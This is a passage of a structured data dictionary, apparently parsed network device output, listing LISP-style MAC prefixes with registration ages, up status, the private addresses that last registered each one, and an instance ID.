"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b191/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b194/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b19d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b1be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b1c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2de/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2ed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b206/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0057.d2ff.b233/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.b23c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b24e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b27e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b2a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.b2b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b3c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b3da/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b3e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.b3e6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b3ef/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b3f2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b3fb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b305/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b30b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b30e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b317/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b31d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0057.d2ff.b32c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b33b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b353/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.b374/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b383/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0057.d2ff.b3b6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"0057.d2ff.b4c4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b4c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b4cd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b4df/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b4ee/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0057.d2ff.b401/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b41c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b440/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b446/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b44c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b44f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b455/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b458/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b45b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b45e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b476/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b488/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b48e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b5d2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b5e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b5f9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b503/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b509/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b512/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b521/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b524/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.b545/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b566/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b575/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b59c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b5a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b5ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b61a/48": {
"last_register": "1d10h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.b65c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.b8db/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b836/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b84b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b88a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b8a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b90b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.b917/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b9b9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b9bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.bac7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.bad3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.badf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.bae2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.ba04/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.ba22/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.ba64/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.baa0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.bac1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.bbed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.bb1b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.bb45/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.bb72/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.bb81/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.bcef/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.bc02/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.bdb5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.be51/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.be99/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.c0f7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.c001/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.c007/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0057.d2ff.c019/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.c05e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.c067/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.c082/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.c139/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"005f.86ff.c676/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0062.ecff.e576/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0062.ecff.384b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.1c92/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"006c.bcff.1d2d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"006c.bcff.1e59/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"006c.bcff.20db/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.1189/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.1c7f/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"006c.bcff.1c80/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.1c86/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"006c.bcff.848a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0072.78ff.fa5a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0076.86ff.a30f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0076.86ff.adf5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0076.86ff.b6c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0077.8dff.3aba/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0087.31ff.3851/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"009e.1eff.eab7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"009e.1eff.9ec2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"009e.1eff.a924/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"009e.1eff.b596/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"009e.1eff.bea2/48": {
"last_register": "04:49:36",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"009e.1eff.1a67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"009e.1eff.a062/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"009e.1eff.a227/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"009e.1eff.a5cf/48": {
"last_register": "02:53:18",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00a3.d1ff.d059/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"00a3.d1ff.2e75/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00a5.bfff.2153/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00a5.bfff.32d4/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00a5.bfff.70f5/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"00a5.bfff.7e39/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00a7.42ff.ca4c/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00a7.42ff.7046/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00a7.42ff.704b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00aa.6eff.0b7f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00af.1fff.47d7/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00af.1fff.ce6d/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00af.1fff.e5ed/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00af.1fff.f1d2/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00b1.e3ff.bb2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.bb41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.bb7a/48": {
"last_register": "08:18:39",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bb80/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bb92/48": {
"last_register": "10:48:23",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bc19/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.bc25/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.bdcf/48": {
"last_register": "04:22:38",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bde1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.bdea/48": {
"last_register": "14:57:37",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.bdf6/48": {
"last_register": "15:03:49",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bd7e/48": {
"last_register": "05:02:13",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.bd90/48": {
"last_register": "02:17:56",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00b1.e3ff.bd96/48": {
"last_register": "1d17h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.bda8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.bdae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00b1.e3ff.be62/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.be8f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.be92/48": {
"last_register": "09:56:06",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.beb6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.bfbb/48": {
"last_register": "07:04:21",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.bfd9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.bfe2/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.bf52/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.bf5b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.bf6d/48": {
"last_register": "03:29:36",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c036/48": {
"last_register": "11:50:16",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.c039/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"00b1.e3ff.c066/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.c1ce/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c11a/48": {
"last_register": "01:37:27",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c147/48": {
"last_register": "01:37:23",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c168/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c25b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c29d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c2a6/48": {
"last_register": "00:11:27",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c2b2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.c3e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c3ed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.c306/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00b1.e3ff.c38d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c402/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c43e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00b1.e3ff.c5cd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c5d6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.c5e5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c5f4/48": {
"last_register": "1d06h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.c5f7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00b1.e3ff.c552/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c573/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c576/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.c57f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00b1.e3ff.c591/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.c6ba/48": {
"last_register": "14:19:31",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.c60c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.c636/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00b1.e3ff.c7c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.c70b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.c70e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.c71a/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.c71d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
